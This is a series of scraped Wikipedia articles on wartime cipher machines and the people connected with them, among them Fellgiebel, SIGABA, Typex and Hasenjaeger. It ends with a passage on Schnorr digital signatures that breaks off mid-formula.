surprise. Indeed, the Royal Air Force had begun to do that in theBay of Biscay, but not anywhere else. Dönitz accepted Maertens view that the EnigmaKey Minfrastructure was secure. Dönitz wrote in his war diary: With the exception of two of three doubtful cases, enemy information about the position of our U-boats appears to have been obtained mainly from extensive use of airborne radar, and the resultant plotting of these positions has enabled him [the enemy] to organize effective diversion of convoy traffic.[12][13] In early May 1943, Maertens was fired by Dönitz for reasons that was beyond his fears about crypto-security and sent him to run theKriegsmarineshipyard inKiel.[12] One reason for Maertens and theKriegsmarine's very high confidence in the Enigma cipher machine was the incorporation of a secret procedure that they believed would thwart any possibility of cracking the code. This was the Stichwort permutation (German:Stichwort), a procedure the Kriegsmarine had introduced that completely altered the Naval Enigma cipher machine's inner and outer key settings that were given on the printed settings list.[11][14]
https://en.wikipedia.org/wiki/Erhard_Maertens
Fritz Erich Fellgiebel(4 October 1886 – 4 September 1944) was aGerman Armygeneral ofsignalsand a resistance fighter, participating in both the 1938 September Conspiracy to topple dictatorAdolf Hitlerand theNazi Party, and the 194420 July plotto assassinate the Fuhrer. In 1929, Fellgiebel became head of the cipher bureau (German:Chiffrierstelle) of theMinistry of the Reichswehr, which would later become theOKW/Chi. He was a signals specialist and was instrumental in introducing a common enciphering machine, theEnigma machine. However, he was unsuccessful in promoting a single cipher agency to coordinate all operations, as was demanded by OKW/Chi and was still blocked byJoachim von Ribbentrop,Heinrich HimmlerandHermann Göringuntil autumn 1943. It was not achieved until GeneralAlbert Prauntook over the post[1]following Fellgiebel's arrest and execution for his role in the 20 July attempted coup. Fellgiebel was born inPöpelwitz[2](Present-day Popowice inWrocław,Poland) in the PrussianProvince of Silesia. At the age of 18, he joined a signals battalion in thePrussian Armyas an officer cadet. During theFirst World War, he served as a captain on the General Staff. After the war, he was assigned toBerlinas a General Staff officer of theReichswehr. His service had been exemplary, and in 1928 he was promoted to the rank ofmajor. Fellgiebel was promotedlieutenant colonelin 1933 and became a fullcolonel(Oberst) the following year. By 1938, he was amajor general. That year, he was appointed Chief of the Army's Signal Establishment and Chief of theWehrmacht's communications liaison to the Supreme Command (OKW). Fellgiebel becameGeneral der Nachrichtentruppe(General of the Communications Troops) on 1 August 1940. In 1942, Fellgiebel was promoted to Chief Signal Officer of Army High Command and of Supreme Command of Armed Forces (German:Chef des Heeresnachrichtenwesens), a position he held until 1944 when he was arrested and executed for his key role in the20 July plotto assassinate Hitler.[3] Adolf Hitler did not fully trust Fellgiebel; Hitler considered him too independent-minded, but Hitler needed Fellgiebel's expertise. Fellgiebel was one of the first to understand that the German military should adopt and use theEnigmaencryptionmachine. As head of Hitler's signal services, Fellgiebel knew everymilitary secret, includingWernher von Braun's rocketry work at thePeenemünde Army Research Center. Through his acquaintance with Colonel GeneralLudwig Beck, his superior, and then Beck's successor, Colonel-GeneralFranz Halder, Fellgiebel contacted the anti-Naziresistancegroup in theWehrmachtarmed forces. In the 1938 September Conspiracy to topple Hitler and the Nazi party on the eve of theMunich Agreement, he was supposed to cut communications throughout Germany while Field MarshalErwin von Witzlebenwould occupy Berlin. He was a key source for theRed Orchestra. Fellgiebel released classified German military information toRudolf Roessler(codename "Lucy" of theLucy spy ring) aboutOperation Citadelwhich allowed Soviet forces to deploy effectively.[4] Fellgiebel was involved in the preparations forOperation Valkyrieand during the attempt on theFührer's life on 20 July 1944[5]tried to cut Hitler'sheadquartersat theWolf's LairinEast Prussiaoff from all telecommunication connections. He only partly succeeded, as he could not prevent the informing ofJoseph Goebbelsin Berlin via separateSSlinks. When it became clear that the attempt had failed, Fellgiebel had to override the communications black-out he had set up. Fellgiebel's most famous act that day was his telephone report to his co-conspirator GeneralFritz Thieleat theBendlerblock, after he was informed that Hitler was still alive:"Etwas Furchtbares ist passiert! Der Führer lebt!"("Something awful has happened! TheFührerlives!"). Fellgiebel was arrested immediately at the Wolf's Lair and tortured for three weeks but did not reveal any names of his co-conspirators.[6]He was charged before theVolksgerichtshof("People's Court"). On 10 August 1944, he was found guilty byRoland Freislerand sentenced to death. He was executed on 4 September 1944 atPlötzensee Prisonin Berlin. TheBundeswehr's barracks, Information Technology School of the Bundeswehr ("Schule Informationstechnik der Bundeswehr") inPöcking, is named theGeneral-Fellgiebel-Kasernein his honour.
https://en.wikipedia.org/wiki/Erich_Fellgiebel
In thehistory of cryptography, theECM Mark IIwas acipher machineused by the United States for messageencryptionfromWorld War IIuntil the 1950s. The machine was also known as theSIGABAorConverter M-134by the Army, orCSP-888/889by the Navy, and a modified Navy version was termed theCSP-2900. Like many machines of the era it used an electromechanical system ofrotorsto encipher messages, but with a number of security improvements over previous designs. No successfulcryptanalysisof the machine during its service lifetime is publicly known. It was clear to US cryptographers well before World War II that the single-stepping mechanical motion of rotor machines (e.g. theHebern machine) could be exploited by attackers. In the case of the famousEnigma machine, these attacks were supposed to be upset by moving the rotors to random locations at the start of each new message. This, however, proved not to be secure enough, and German Enigma messages were frequently broken bycryptanalysisduring World War II. William Friedman, director of theUS Army'sSignals Intelligence Service, devised a system to correct for this attack by truly randomizing the motion of the rotors. His modification consisted of apaper tapereader from ateletypemachine attached to a small device with metal "feelers" positioned to pass electricity through the holes. When a letter was pressed on the keyboard the signal would be sent through the rotors as it was in the Enigma, producing an encrypted version. In addition, the current would also flow through the paper tape attachment, and any holes in the tape at its current location would cause the corresponding rotor to turn, and then advance the paper tape one position. In comparison, the Enigma rotated its rotors one position with each key press, a much less random movement. The resulting design went into limited production as theM-134 Converter, and its message settings included the position of the tape and the settings of a plugboard that indicated which line of holes on the tape controlled which rotors. However, there were problems using fragile paper tapes under field conditions. Friedman's associate,Frank Rowlett, then came up with a different way to advance the rotors, using another set of rotors. In Rowlett's design, each rotor must be constructed such that between one and four output signals were generated, advancing one or more of the rotors (rotors normally have one output for every input). There was little money for encryption development in the US before the war, so Friedman and Rowlett built a series of "add on" devices called theSIGGOO(or M-229) that were used with the existing M-134s in place of the paper tape reader. These were external boxes containing a three rotor setup in which five of the inputs were live, as if someone had pressed five keys at the same time on an Enigma, and the outputs were "gathered up" into five groups as well — that is all the letters from A to E would be wired together for instance. That way the five signals on the input side would be randomized through the rotors, and come out the far side with power in one of five lines. Now the movement of the rotors could be controlled with a day code, and the paper tape was eliminated. They referred to the combination of machines as the M-134-C. In 1935 they showed their work toJoseph Wenger, a cryptographer in theOP-20-Gsection of theU.S. Navy. He found little interest for it in the Navy until early 1937, when he showed it to CommanderLaurance Safford, Friedman's counterpart in theOffice of Naval Intelligence. He immediately saw the potential of the machine, and he and Commander Seiler then added a number of features to make the machine easier to build, resulting in theElectric Code Machine Mark II(orECM Mark II), which the navy then produced as the CSP-889 (or 888). Oddly, the Army was unaware of either the changes or the mass production of the system, but were "let in" on the secret in early 1940. In 1941 the Army and Navy joined in a joint cryptographic system, based on the machine. The Army then started using it as theSIGABA. Just over 10,000 machines were built.[1]: p. 152 On 26 June 1942, the Army and Navy agreed not to allow SIGABA machines to be placed in foreign territory except where armed American personnel were able to protect the machine.[2]The SIGABA would be made available to another Allied country only if personnel of that country were denied direct access to the machine or its operation by an American liaison officer who would operate it.[2] SIGABA was similar to the Enigma in basic theory, in that it used a series of rotors to encipher every character of the plaintext into a different character of ciphertext. Unlike Enigma's three rotors however, the SIGABA included fifteen, and did not use a reflecting rotor. The SIGABA had three banks of five rotors each; the action of two of the banks controlled the stepping of the third. The SIGABA advanced one or more of its main rotors in a complex, pseudorandom fashion. This meant that attacks which could break other rotor machines with simpler stepping (for example, Enigma) were made much more complex. Even with the plaintext in hand, there were so many potential inputs to the encryption that it was difficult to work out the settings. On the downside, the SIGABA was also large, heavy, expensive, difficult to operate, mechanically complex, and fragile. It was nowhere near as practical a device as the Enigma, which was smaller and lighter than the radios with which it was used. It found widespread use in the radio rooms of US Navy ships, but as a result of these practical problems the SIGABA simply couldn't be used in the field. In most theatres other systems were used instead, especially for tactical communications. One of the most famous was the use ofNavajo code talkersfor tactical field communications in the Pacific Theater. In other theatres, less secure, but smaller, lighter, and sturdier machines were used, such as theM-209. SIGABA, impressive as it was, was overkill for tactical communications. This said, new speculative evidence emerged more recently that the M-209 code was broken by German cryptanalysts during World War II.[3] Because SIGABA did not have a reflector, a 26+ pole switch was needed to change the signal paths through the alphabet maze between the encryption and decryption modes. The long “controller” switch was mounted vertically, with its knob on the top of the housing. See image. It had five positions, O, P, R, E and D. Besides encrypt (E) and decrypt (D), it had a plain text position (P) that printed whatever was typed on the output tape, and a reset position (R) that was used to set the rotors and to zeroize the machine. The O position turned the machine off. The P setting was used to print the indicators and date/time groups on the output tape. It was the only mode that printed numbers. No printing took place in the R setting, but digit keys were active to increment rotors. During encryption, the Z key was connected to the X key and the space bar produced a Z input to the alphabet maze. A Z was printed as a space on decryption. The reader was expected to understand that a word like “xebra” in a decrypted message was actually “zebra.” The printer automatically added a space between each group of five characters during encryption. The SIGABA was zeroized when all the index rotors read zero in their low order digit and all the alphabet and code rotors were set to the letter O. Each rotor had a cam that caused the rotor to stop in the proper position during the zeroize process. SIGABA's rotors were all housed in a removable frame held in place by four thumb screws. This allowed the most sensitive elements of the machine to be stored in more secure safes and to be quickly thrown overboard or otherwise destroyed if capture was threatened. It also allowed a machine to quickly switch between networks that used different rotor orders. Messages had two 5- character indicators, an exterior indicator that specified the system being used and the security classification and an interior indicator that determined the initial settings of the code and alphabet rotors. The key list included separate index rotor settings for each security classification. This prevented lower classification messages from being used as cribs to attack higher classification messages. The Navy and Army had different procedures for the interior indicator. Both started by zeroizing the machine and having the operator select a random 5-character string for each new message. This was then encrypted to produce the interior indicator. Army key lists included an initial setting for the rotors that was used to encrypt the random string. The Navy operators used the keyboard to increment the code rotors until they matched the random character string. The alphabet rotor would move during this process and their final position was the internal indicator. In case of joint operations, the Army procedures were followed. The key lists included a “26-30” check string. After the rotors were reordered according to the current key, the operator would zeroize the machine, encrypt 25 characters and then encrypt “AAAAA”. The ciphertext resulting from the five A's had to match the check string. The manual warned that typographical errors were possible in key lists and that a four character match should be accepted. The manual also gave suggestions on how to generate random strings for creating indicators. These included using playing cards and poker chips, to selecting characters from cipher texts and using the SIGABA itself as a random character generator.[4] Although the SIGABA was extremely secure, the US continued to upgrade its capability throughout the war, for fear of the Axis cryptanalytic ability to break SIGABA's code. When the German'sENIGMAmessages and Japan'sType B Cipher Machinewere broken, the messages were closely scrutinized for signs that Axis forces were able to read the US cryptography codes. Axisprisoners of war(POWs) were also interrogated with the goal of finding evidence that US cryptography had been broken. However, neither the Germans nor the Japanese were making any progress in breaking the SIGABA code. A decrypted JN-A-20 message, dated 24 January 1942, sent from the navalattachéin Berlin to vice chief of Japanese Naval General Staff in Tokyo stated that "joint Jap[anese]-German cryptanalytical efforts" to be "highly satisfactory", since the "German[s] have exhibited commendable ingenuity and recently experienced some success on English Navy systems", but are "encountering difficulty in establishing successful techniques of attack on 'enemy' code setup". In another decrypted JN-A-20 message, the Germans admitted that their progress in breaking US communications was unsatisfactory. The Japanese also admitted in their own communications that they had made no real progress against the American cipher system. In September 1944, when the Allies were advancing steadily on the Western front, the war diary of the German Signal Intelligence Group recorded: "U.S. 5-letter traffic: Work discontinued as unprofitable at this time".[5] SIGABA systems were closely guarded at all times, with separate safes for the system base and the code-wheel assembly, but there was one incident where a unit was lost for a time. On February 3, 1945, a truck carrying a SIGABA system in three safes was stolen while its guards were visiting a brothel in recently liberatedColmar, France.General Eisenhowerordered an extensive search, which finally discovered the safes six weeks later in a nearby river.[6]: pp.510–512 The need for cooperation among US, British, and Canadian forces in carrying out joint military operations against Axis forces gave rise to the need for a cipher system that could be used by all Allied forces. This functionality was achieved in three different ways. Firstly, the ECM Adapter (CSP 1000), which could beretrofittedon Allied cipher machines, was produced at the Washington Naval Yard ECM Repair Shop. A total of 3,500 adapters were produced.[5]The second method was to adapt the SIGABA for interoperation with a modified British machine, theTypex. The common machine was known as theCombined Cipher Machine(CCM), and was used from November 1943.[2]Because of the high cost of production, only 631 CCMs were made. The third way was the most common and most cost-effective. It was the "X" Adapter manufactured by theTeletype Corporationin Chicago. A total of 4,500 of these adapters were installed at depot-level maintenance facilities.[5]
https://en.wikipedia.org/wiki/SIGABA
Fritz Thiele(14 April 1894 – 4 September 1944) was a member of theGerman resistancewho also served as the communications chief of theGerman ArmyduringWorld War II.[1] Thiele was born inBerlinand joined the Imperial Army in 1914. Working closely with Chief of Army communicationsGeneral der NachrichtentruppeErich Fellgiebel, he was part of theassassination attemptagainstAdolf Hitleron 20 July 1944. He was responsible as part of the coup attempt in the effort to sever communications between officers loyal to Hitler and armed forces units in the field and from the communications centre at theBendlerstrassein Berlin; he relayed a crucial message from Fellgiebel to GeneralFriedrich Olbrichtand the other conspirators that the assassination attempt had failed but the coup attempt should still proceed. There are differing accounts of the time when he provided this report. Thiele himself did not want to proceed with the coup attempt when he knew that the assassination attempt had failed and he left the Bendlerstrasse and visitedWalter Schellenbergat theReich Central Security Officein an attempt to extricate himself.[2] Following Fellgiebel's arrest, Thiel was directed to assume his duties before he was himself arrested by theGestapoon 11 August 1944. He was condemned to death on 21 August 1944 by theVolksgerichtshofand hanged on 4 September 1944 atPlötzenseeprison in Berlin. This German World War II article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Fritz_Thiele
Gisbert F. R. Hasenjaeger(1 June 1919 – 2 September 2006) was a Germanmathematicallogician. Independently and simultaneously withLeon Henkinin 1949, he developed a new proof of thecompletenesstheorem ofKurt Gödelforpredicate logic.[2][3]He worked as an assistant toHeinrich Scholzat Section IVa ofOberkommando der Wehrmacht Chiffrierabteilung, and was responsible for the security of theEnigma machine.[4] Gisbert Hasenjaeger went to high school inMülheim, where his fatherEdwin Renatus Hasenjaeger[de]was a lawyer and local politician. After completing school in 1936, Gisbert volunteered for labour service. He was drafted for military service inWorld War II, and fought as an artillerist in theRussian campaign, where he was badly wounded in January 1942. After his recovery, in October 1942,Heinrich Scholz[5]got him employment in theCipher Department of the High Command of the Wehrmacht(OKW/Chi), where he was the youngest member at 24. He attended acryptographytraining course byErich Hüttenhain, and was put into the recently founded Section IVa "Security check of own Encoding Procedures" underKarl Stein, who assigned him the security check of theEnigma machine.[6][7]At the end of the war as OKW/Chi disintegrated, Hasenjaeger managed to escapeTICOM, the United States effort to roundup and seize captured German intelligence people and material.[6] From the end of 1945, he studied mathematics and especially mathematical logic withHeinrich Scholzat theWestfälische Wilhelms-UniversitätUniversity in Münster. In 1950 received his doctorateTopological studies on the semantics and syntax of an extended predicate calculusand completed his habilitation in 1953.[3] In Münster, Hasenjaeger worked as an assistant to Scholz and later co-author, to write the textbookFundamentals of Mathematical LogicinSpringer's Grundlehren series(Yellow series of Springer-Verlag), which he published in 1961 fully 6 years after Scholz's death. In 1962, he became a professor at theUniversity of Bonn, where he was Director of the newly created Department of Logic.[3] In 1962, Dr Hasenjaeger left Münster University to take a full professorship at Bonn University, where he became Director of the newly established Department of Logic and Basic Research. In 1964/65, he spent a year atPrinceton Universityat theInstitute for Advanced Study[8]His doctoral students at Bonn includedRonald B. Jensen, his most famous pupil.[3] Hasenjaeger became professor emeritus in 1984.[9] In October 1942, after starting work atOKW/Chi, Hasenjaeger was trained in cryptology, given by the mathematician,Erich Hüttenhain, who was widely considered the most important German cryptologist of his time. Hasenjaeger was put into a newly formed department, whose principal responsibility was the defensive testing and security control of their own methods and devices.[6][10]Hasenjaeger was ordered, by the mathematicianKarl Steinwho was also conscripted at OKW/Chi, to examine theEnigma machinefor cryptologic weaknesses, while Stein was to examine theSiemens and Halske T52and theLorenz SZ-42.[10]The Enigma machine that Hasenjaeger examined was a variation that worked with 3 rotors and had no plugboard. Germany sold this version to neutral countries to accrue foreign exchange. Hasenjaeger was presented with a 100 character encrypted message for analysis and found a weakness which enabled the identification of the correct wiring rotors and also the appropriate rotor positions, to decrypt the messages. Further success eluded him, however. He crucially failed to identify the most important weakness of the Enigma machine: the lack of fixed points (letters encrypting to themselves) due to the reflector. Hasenjaeger could take some comfort from the fact that evenAlan Turingmissed this weakness. Instead, the honour was attributed toGordon Welchman, who used the knowledge to decrypt several hundred thousand Enigma messages during the war.[6][10]In fact fixed points were earlier used by Polish codebreaker, Henryk Zygalski, as the basis for his method of attack on Enigma cipher, referred to by the Poles as "Zygalski sheets" (Zygalski sheets) (płachty Zygalskiego) and by the British as the "Netz method". It was while Hasenjaeger was working atWestfälische Wilhelms-UniversitätUniversity in Münster in the period between 1946 and 1953 that Hasenjaeger made a most amazing discovery - aproofofKurt Gödel'sGödel's completenesstheoremfor fullpredicate logicwith identity and function symbols.[3]Gödel's proof of 1930 for predicate logic did not automatically establish a procedure for the general case. When he had solved the problem in late 1949, he was frustrated to find that a young American mathematicianLeon Henkin, had also created a proof.[3]Both construct from extension of aterm model, which is then the model for the initial theory. Although the Henkin proof was considered by Hasenjaeger and his peers to be more flexible, Hasenjaeger's is considered simpler and more transparent.[3] Hasenjaeger continued to refine his proof through to 1953 when he made a breakthrough. According to the mathematiciansAlfred Tarski,Stephen Cole KleeneandAndrzej Mostowski, theArithmetical hierarchyof formulas is the set of arithmetical propositions that are true in the standard model, but not arithmetically definable. So, what does the concept oftruthfor the term model mean, the results for the recursivelyaxiomatizedPeano arithmeticfrom the Hasenjaeger method? The result was thetruth predicateis well arithmetically, it is evenΔ20{\displaystyle \Delta _{2}^{0}}.[3]So far down in the arithmetic hierarchy, and that goes for any recursively axiomatized (countable, consistent) theories. Even if you are true in all thenatural numbersΠ10{\displaystyle \Pi _{1}^{0}}formulas to the axioms. This classic proof is a very early, original application of the arithmetic hierarchy theory to a general-logical problem. It appeared in 1953 in theJournal of Symbolic Logic.[11] In 1963, Hasenjaeger built aUniversal Turing machineout of old telephone relays. Although Hasenjaeger's work on UTMs was largely unknown and he never published any details of the machinery during his lifetime, his family decided to donate the machine to theHeinz Nixdorf MuseuminPaderborn,Germany, after his death.[12][13]In an academic paper presented at theInternational Conference of History and Philosophy of Computingin 2012.[12]Rainer Glaschick, Turlough Neary, Damien Woods, Niall Murphy had examined Hasenjaeger's UTM machine at the request of Hasenjaeger family and found that the UTM was remarkably small and efficientlyuniversal. Hasenjaeger UTM contained 3-tapes, 4 states, 2 symbols and was an evolution of ideas fromEdward F. Moore's first universal machine andHao Wang'sB-machine. Hasenjaeger went on to build a small efficient Wang B-machine simulator. This was again proven by the team assembled by Rainer Glaschick to be efficientlyuniversal. It was only in the 1970s that Hasenjaeger learned that the Enigma Machine had been so comprehensively broken.[6]It impressed him that Alan Turing himself, considered one of the greatest mathematicians of the 20th century, had worked on breaking the device. The fact that the Germans had so comprehensively underestimated the weaknesses of the device, in contrast to Turing and Welchman's work, was seen by Hasenjaeger today as entirely positive. Hasenjaeger stated: Would it not been so, then the war would have lasted probably longer and the first atomic bomb had not fallen on Japan, but on Germany.[6]
https://en.wikipedia.org/wiki/Gisbert_Hasenjaeger
TheUnited States Naval Computing Machine Laboratory(NCML) was a highly secret design and manufacturing site forcode-breakingmachinery located in Building 26 of theNational Cash Register(NCR) company inDayton, Ohioand operated by theUnited States NavyduringWorld War II. It is now on theList of IEEE Milestones,[1]and one of its machines is on display at theNational Cryptologic Museum. The laboratory was established in 1942 by the Navy andNational Cash Register Companyto design and manufacture a series of code-breaking machines ("bombes") targeting GermanEnigma machines, based on earlier work by the British atBletchley Park(which in turn owed something to pre-war Polish cryptanalytical work).Joseph Deschled the effort.[2]Preliminary designs, approved in September 1942, called for a fully electronic machine to be delivered by year's end. However, these plans were soon judged infeasible, and revised plans were approved in January 1943 for an electromechanical machine, which became theUS Navy bombe. These designs were proceeding in parallel with, and influenced by, British attempts to build a high-speed bombe for the German 4-rotor Enigma. Indeed,Alan Turingvisited Dayton in December 1942. His reaction was far from enthusiastic: The American approach was, however, successful. The first two experimental bombes went into operation in May 1943, running in Dayton so they could be observed by their engineers. Designs for production models were completed in April, 1943, with initial operation starting in early June. All told, the laboratory constructed 121 bombes which were then employed for code-breaking in the US Navy's signals intelligence and cryptanalysis groupOP-20-GinWashington, D.C.[4]Construction was accomplished in three shifts per day by some 600WAVES(Women Accepted for Volunteer Emergency Service), 100 Navy officers and enlisted men, and a large civilian workforce. Approximately 3,000 workers operated the bombes to produce "Ultra" decryptions of German Enigma traffic. According to a contemporary US Navy report (dated April 1944), the bombes were used on naval jobs until all daily keys had been run; then the machines were used for non-naval tasks. During the previous six months, about 45% of the bombe time had been devoted to non-naval problems carried out at the request of the British. British production and reliability problems with their own high-speed bombes had then recently led to construction of 50 additional Navy units for Army and Air Force keys. The documentary, ″Dayton Codebreakers″, producer Aileen LeBlanc, was released in 2006 on American Public Television.[5] The location in Dayton, Building 26[6]on the former National Cash Register Company, was an Art Deco design of Dayton firmSchenck & Williamsand was located at Patterson Blvd and Stewart Street. The building was demolished by the University of Dayton in January 2008.[7]
https://en.wikipedia.org/wiki/United_States_Naval_Computing_Machine_Laboratory
In thehistory of cryptography,Typex(alternatively,Type XorTypeX) machines wereBritishcipher machines used from 1937. It was an adaptation of the commercial GermanEnigmawith a number of enhancements that greatly increased its security. The cipher machine (and its many revisions) was used until the mid-1950s when other more modern military encryption systems came into use. Like Enigma, Typex was arotor machine. Typex came in a number of variations, but all contained five rotors, as opposed to three or four in the Enigma. Like the Enigma, the signal was sent through the rotors twice, using a "reflector" at the end of the rotor stack. On a Typex rotor, each electrical contact was doubled to improve reliability. Of the five rotors, typically the first two were stationary. These provided additional enciphering without adding complexity to the rotor turning mechanisms. Their purpose was similar to the plugboard in the Enigmas, offering additional randomization that could be easily changed. Unlike Enigma's plugboard, however, the wiring of those two rotors could not be easily changed day-to-day. Plugboards were added to later versions of Typex. The major improvement the Typex had over the standard Enigma was that the rotors in the machine contained multiple notches that would turn the neighbouring rotor. This eliminated an entire class of attacks on the system, whereas Enigma's fixed notches resulted in certain patterns appearing in the cyphertext that could be seen under certain circumstances. Some Typex rotors came in two parts, where aslugcontaining the wiring was inserted into a metal casing. Different casings contained different numbers of notches around the rim, such as 5, 7 or 9 notches. Each slug could be inserted into a casing in two different ways by turning it over. In use, all the rotors of the machine would use casings with the same number of notches. Normally five slugs were chosen from a set of ten. On some models, operators could achieve a speed of 20 words a minute, and the output ciphertext or plaintext was printed on paper tape. For some portable versions, such as the Mark III, a message was typed with the left hand while the right hand turned a handle.[1] Several Internet Typex articles say that onlyVaselinewas used to lubricate Typex machines and that no other lubricant was used. Vaseline was used to lubricate the rotor disc contacts. Without this there was a risk of arcing which would burn the insulation between the contacts. For the rest of the machine two grades of oil (Spindle Oils 1 and 2) were used. Regular cleaning and maintenance was essential. In particular, the letters/figures cam-clusterbalatadiscs had to be kept lubricated.[citation needed] By the 1920s, the British Government was seeking a replacement for itsbook ciphersystems, which had been shown to be insecure and which proved to be slow and awkward to use. In 1926, an inter-departmental committee was formed to consider whether they could be replaced with cipher machines. Over a period of several years and at large expense, the committee investigated a number of options but no proposal was decided upon. One suggestion was put forward by Wing CommanderOswyn G. W. G. Lywoodto adapt the commercial Enigma by adding a printing unit but the committee decided against pursuing Lywood's proposal. In August 1934, Lywood began work on a machine authorised by theRAF. Lywood worked with J. C. Coulson, Albert P. Lemmon, and Ernest W. Smith atKidbrookeinGreenwich, with the printing unit provided byCreed & Company. The first prototype was delivered to theAir Ministryon 30 April 1935. In early 1937, around 30 Typex Mark I machines were supplied to the RAF. The machine was initially termed the "RAF Enigma with Type X attachments". The design of its successor had begun by February 1937. In June 1938,Typex Mark IIwas demonstrated to the cipher-machine committee, who approved an order of 350 machines. The Mark II model was bulky, incorporating two printers: one for plaintext and one for ciphertext. As a result, it was significantly larger than the Enigma, weighing around 120 lb (54 kg) , and measuring 30 in (760 mm) × 22 in (560 mm) × 14 in (360 mm). After trials, the machine was adopted by the RAF, Army and other government departments. DuringWorld War II, a large number of Typex machines were manufactured by the tabulating machine manufacturerPowers-Samas.[2] Typex Mark IIIwas a more portable variant, using the same drums as the Mark II machines powered by turning a handle (it was also possible to attach a motor drive). The maximum operating speed is around 60 letters a minute, significantly slower than the 300 achievable with the Mark II. Typex Mark VIwas another handle-operated variant, measuring 20 in (510 mm) ×12 in (300 mm) ×9 in (230 mm), weighing 30 lb (14 kg) and consisting of over 700 components. Plugboards for the reflector were added to the machine from November 1941. For inter-Allied communications duringWorld War II, theCombined Cipher Machine(CCM) was developed, used in theRoyal Navyfrom November 1943. The CCM was implemented by making modifications to Typex and the United StatesECM Mark IImachine so that they would be compatible. Typex Mark VIIIwas a Mark II fitted with a morse perforator. Typex 22(BID/08/2) andTypex 23(BID/08/3) were late models, that incorporated plugboards for improved security. Mark 23 was a Mark 22 modified for use with the CCM. InNew Zealand, Typex Mark II and Mark III were superseded by Mark 22 and Mark 23 on 1 January 1950. The Royal Air Force used a combination of the Creed Teleprinter and Typex until 1960. This amalgamation allowed a single operator to use punch tape and printouts for both sending and receiving encrypted material. Erskine (2002) estimates that around 12,000 Typex machines were built by the end of World War II. Less than a year into the war, the Germans could read all British military encryption other than Typex,[3]which was used by the British armed forces and by Commonwealth countries including Australia, Canada and New Zealand. TheRoyal Navydecided to adopt the RAF Type X Mark II in 1940 after trials; eight stations already had Type X machines. Eventually over 600 machines would be required. New Zealand initially got two machines at a cost of £115 (GBP) each for Auckland and Wellington.[4] From 1943 the Americans and the British agreed upon aCombined Cipher Machine(CCM). The British Typex and AmericanECM Mark IIcould be adapted to become interoperable. While the British showed Typex to the Americans, the Americans never permitted the British to see the ECM, which was a more complex design. Instead, attachments were built for both that allowed them to read messages created on the other. In 1944 the Admiralty decided to supply 2 CCM Mark III machines (the Typex Mark II with adaptors for the American CCM) for each "major" war vessel down to and including corvettes but not submarines; RNZN vessels were theAchilles,Arabis(then out of action),Arbutus,GambiaandMatua.[5] Although a British test cryptanalytic attack made considerable progress, the results were not as significant as against the Enigma, due to the increased complexity of the system and the low levels of traffic. A Typex machine without rotors was captured by German forces atDunkirkduring theBattle of Franceand more than one German cryptanalytic section proposed attempting to crack Typex; however, theB-Dienstcodebreaking organisation gave up on it after six weeks, when further time and personnel for such attempts were refused.[6] One German cryptanalyst stated that the Typex was more secure than the Enigma since it had seven rotors, therefore no major effort was made to crack Typex messages as they believed that even the Enigma's messages were unbreakable.[7] Although the Typex has been attributed as having good security, the historic record is much less clear. There was an ongoing investigation into Typex security that arose out of German POWs in North Africa claiming that Typex traffic was decipherable. A brief excerpt from the report TOP SECRET U [ZIP/SAC/G.34]THE POSSIBLE EXPLOITATION OF TYPEX BY THE GERMAN SIGINT SERVICESThe following is a summary of information so far received on German attempts to break into the British Typex machine, based on P/W interrogations carried out during and subsequent to the war. It is divided into (a) the North African interrogations, (b) information gathered after the end of the war, and (c) an attempt to sum up the evidence for and against the possibility of German successes.Apart from an unconfirmed report from an agent in France on 19 July 1942 to the effect that the GAF were using two British machines captured at DUNKIRK for passing their own traffic between BERLIN and GOLDAP, our evidence during the war was based on reports that OKH was exploiting Typex material left behind in TOBRUK in 1942. Typex machines continued in use long after World War II. TheNew Zealandmilitary used TypeX machines until the early 1970s, disposing of its last machine in about 1973.[8] All the versions of the Typex had advantages over the German military versions of the Enigma machine. The German equivalent teleprinter machines in World War II (used by higher-level but not field units) were theLorenz SZ 40/42andSiemens and Halske T52usingFish cyphers.
https://en.wikipedia.org/wiki/Typex
Incryptography, aSchnorr signatureis adigital signatureproduced by theSchnorr signature algorithmthat was described byClaus Schnorr. It is a digital signature scheme known for its simplicity, among the first whose security is based on theintractabilityof certaindiscrete logarithmproblems. It is efficient and generates short signatures.[1]It was covered byU.S. patent 4,995,082which expired in February 2010. In the following, To sign a messageM{\displaystyle M}: The signature is the pair,(s,e){\displaystyle (s,e)}. Note thats,e∈Z/qZ{\displaystyle s,e\in \mathbb {Z} /q\mathbb {Z} }; ifq<2256{\displaystyle q<2^{256}}, then the signature representation can fit into 64 bytes. Ifev=e{\displaystyle e_{v}=e}then the signature is verified. It is relatively easy to see thatev=e{\displaystyle e_{v}=e}if the signed message equals the verified message: rv=gsye=gk+xeg−xe=gk=r{\displaystyle r_{v}=g^{s}y^{e}=g^{k+xe}g^{-xe}=g^{k}=r}, and henceev=H(rv∥M)=H(r∥M)=e{\displaystyle e_{v}=H(r_{v}\parallel M)=H(r\parallel M)=e}. Public elements:G{\displaystyle G},g{\displaystyle g},q{\displaystyle q},y{\displaystyle y},s{\displaystyle s},e{\displaystyle e},r{\displaystyle r}. Private elements:k{\displaystyle k},x{\displaystyle x}. This shows only that a correctly signed message will verify correctly; many other properties are required for a secure signature algorithm. Just as with the closely related signature algorithmsDSA,ECDSA, andElGamal, reusing the secret nonce valuek{\displaystyle k}on two Schnorr signatures of different messages will allow observers to recover the private key.[2]In the case of Schnorr signatures, this simply requires subtractings{\displaystyle s}values: Ifk′=k{\displaystyle k'=k}bute′≠e{\displaystyle e'\neq e}thenx{\displaystyle x}can be simply isolated. In fact, even slight biases in the valuek{\displaystyle k}or partial leakage ofk{\displaystyle k}can reveal the private key, after collecting sufficiently many signatures and solving thehidden number problem.[2] The signature scheme was constructed by applying theFiat–Shamir transformation[3]to Schnorr's identification protocol.[4][5]Therefore, (as per Fiat and Shamir's arguments), it is secure ifH{\displaystyle H}is modeled as arandom oracle. Its security can also be argued in thegeneric group model, under the assumption thatH{\displaystyle H}is "random-prefix preimage resistant" and "random-prefix second-preimage resistant".[6]In particular,H{\displaystyle H}doesnotneed to becollision resistant. In 2012, Seurin[1]provided an exact proof of the Schnorr signature scheme. In particular, Seurin shows that the security proof using theforking lemmais the best possible result for any signature schemes based on one-waygroup homomorphismsincluding Schnorr-type signatures and theGuillou–Quisquater signature schemes. Namely, under theROMDLassumption, any algebraic reduction must lose a factorf(ϵF)qh{\displaystyle f({\epsilon }_{F})q_{h}}in its time-to-success ratio, wheref≤1{\displaystyle f\leq 1}is a function that remains close to 1 as long as "ϵF{\displaystyle 